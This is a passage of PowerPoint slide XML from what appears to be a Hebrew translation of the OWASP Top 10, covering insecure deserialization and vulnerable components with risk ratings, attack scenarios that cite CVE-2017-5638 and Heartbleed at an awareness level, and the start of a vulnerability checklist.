                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18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CB1D"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>שכיחות: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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marL="0" marR="0" indent="0" algn="ctr" defTabSz="914400" rtl="1" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>יכולת גילוי: 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:ea typeface="OpenSymbol"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>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algn="ctr" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1200"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>השפעה טכנית: 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1260000">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ניצול תהליך פתיחה</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> לא מאובטחת של רצף סדרתי (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>serialization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="0" i="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)  הינו תהליך מורכב, בשל העובדה שחולשות לרוב אינן פועלות ללא הצורך בשינוי או עדכון בקוד.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" b="0" i="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="24292E"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>בעיה זו כלולה בעשרת פגיעויות האבטחה בהתבסס על </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>סקר</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ולא על מידע הניתן למדידה.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חלק מהכלים עשויים לזהות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> חולשות אלו, אך סיוע אנושי נדרש לרוב על-מנת לאשר את הבעיה. מצופה כי שכיחות המידע אודות חולשה זו תגדל ככל שמפותחים כלים אשר עשויים לסייע לזיהוי וטיפול בבעיה.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה של חולשה זה לא ניתנת להבנה. חולשות מסוג זה עשויות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> להוביל להרצת קוד זדוני מרחוק, אחת המתקפות החמורות ביותר.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה העסקית תלויה בהגנה הנדרשת על היישום ועל המידע.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20977897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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>רכיבים לרוב רצים עם הרשאות חשבון המשתמש של היישום, כך שפגם בכל אחד מרכיבי המערכת עשוי להשפיע בצורה משמעותית. פגמים מעין אלו עשויים לנבוע כתוצאה מטעות (דוגמת טעות בקוד) או בצורה מכוונת (דוגמת דלת אחורית ברכיב המערכת). דוגמאות לניצול חולשות ברכיבים:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>CVE-2017-5638</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, חולשת ניצול קוד מרוחק ב-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Struts 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> מאפשרת הרצת קוד זדוני על שרת היעד, אשר מספר רב של פריצות אבטחה התבססו על חולשה זו.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אומנם מורכב לעדכן שירותי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>internet of things (IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, החשיבות של עדכוני אבטחה רבה (לדוגמא התקנים המשלבים ביולוגיה וטכנולוגיה).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קיימים כלים ממוכנים אשר עשויים לסייע לתוקפים לגלות מערכות לא מעודכנות או מוגדרות בצורה לקויה. לדוגמא, מנוע החיפוש </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IoT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> עשוי לסייע </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>במציאת התקנים כאלו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, אשר עשויים לסבול מחולשת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Heartbleed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר הופץ לה עדכון באפריל 2014.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3466100" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>אתה עשוי להיות פגיע:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800" algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>במידה ואינך יודע את הגרסאות של כל מרכיבי המערכת אשר בשימוש (בצד הלקוח ובצד השרת). הדבר כולל מרכיבים אשר אתה משתמש בצורה ישירה או תלויות במרכיבים אחרים</a:t>
            </a:r>
            <a:r>
